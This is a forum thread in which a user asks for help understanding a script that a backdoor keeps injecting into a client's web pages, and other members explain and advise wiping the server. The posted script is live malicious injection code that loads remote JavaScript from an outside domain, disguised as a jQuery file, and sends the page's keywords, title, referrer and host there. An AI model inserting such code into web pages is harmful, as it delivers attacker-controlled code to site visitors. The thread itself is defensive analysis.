1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Help me decipher injected code?

Discussion in 'BlackHat Lounge' started by nikchaing, Jun 2, 2016.

  1. nikchaing

    nikchaing Jr. VIP Jr. VIP UnGagged Attendee

    Joined:
    Apr 24, 2013
    Messages:
    1,114
    Likes Received:
    2,192
    Location:
    Florida
    Hey guys, I have a client that has a backdoor somewhere on their server. It keeps injecting this code to the header of pages. I'm pretty sure they're just gonna scrap it all, and start over fresh on another server. My question is, can someone help me understand what exactly this script is doing. Seems like it's presenting the injected content based on a certain referrer, but that's all that I can gather. I would greatly appreciate any insight you may have. Thanks!

    Code:
    <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://vertekoasys.com/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://vertekoasys.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
    
     
  2. McPatrick

    McPatrick Regular Member

    Joined:
    Feb 1, 2015
    Messages:
    244
    Likes Received:
    103
    Gender:
    Male
    Occupation:
    Problem-solver
    Location:
    London
    Home Page:
    I am not JS guy, but did you try to run the malware/injection scan on your server?
     
  3. tb303

    tb303 Senior Member

    Joined:
    Dec 18, 2011
    Messages:
    849
    Likes Received:
    534
    looks its inserting a <script> when there's no referrer (direct hit) that downloads and runs some javascript returned by the php at "hxxp://vertekoasys.com/js/jquery.min.php?....".

    I dont know what that js is as it requires various params sent by the injected code like meta keywords, document title and more and i have no intention of running that script. the url just returns nothing if they are missing.

    if possible, nuke it and be safe.